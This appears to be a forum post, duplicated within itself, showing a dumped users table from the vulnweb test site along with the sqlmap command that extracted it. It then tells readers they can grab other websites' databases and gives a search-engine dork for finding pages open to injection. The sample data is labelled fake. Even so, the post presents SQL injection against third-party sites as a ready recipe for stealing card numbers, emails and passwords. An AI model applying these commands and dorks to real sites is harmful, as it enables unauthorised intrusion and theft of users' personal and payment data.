OP 19 November, 2023 - 07:26 AM
(This post was last modified: 19 November, 2023 - 07:28 AM by iLoveNuggets.)
vulnweb.com database
This is a bump
REMINDER, NOBODY WAS HARM THIS WAS FAKE DATABASE FROM
VULNWEB
cc,name,email,pass,cart,address,phone,uname
1234-5678-2300-9000,
John Smith,
[email protected],
test,
e9a6a1f8bdb08071809956aaf9e8ae87,
21 street\r\n\r\n,
2323345,
test
How I do it
Use SQLMAP
Commands :
python sqlmap.py -u http://testphp.vulnweb.com/listproducts.php?cat=1 --dump -D acuart -T users -C cc,email,pass,cart,address,name,phone,uname
You can get someone website database, of they have of. php?id=2
to find website has, php?id=2 look this up: site: login inurl:php?id=2
VULNWEB
cc,name,email,pass,cart,address,phone,uname
1234-5678-2300-9000,
John Smith,
[email protected],
test,
e9a6a1f8bdb08071809956aaf9e8ae87,
21 street\r\n\r\n,
2323345,
test
How I do it
Use SQLMAP
Commands :
python sqlmap.py -u http://testphp.vulnweb.com/listproducts.php?cat=1 --dump -D acuart -T users -C cc,email,pass,cart,address,name,phone,uname
You can get someone website database, of they have of. php?id=2
to find website has, php?id=2 look this up: site: login inurl:php?id=2
This is a bump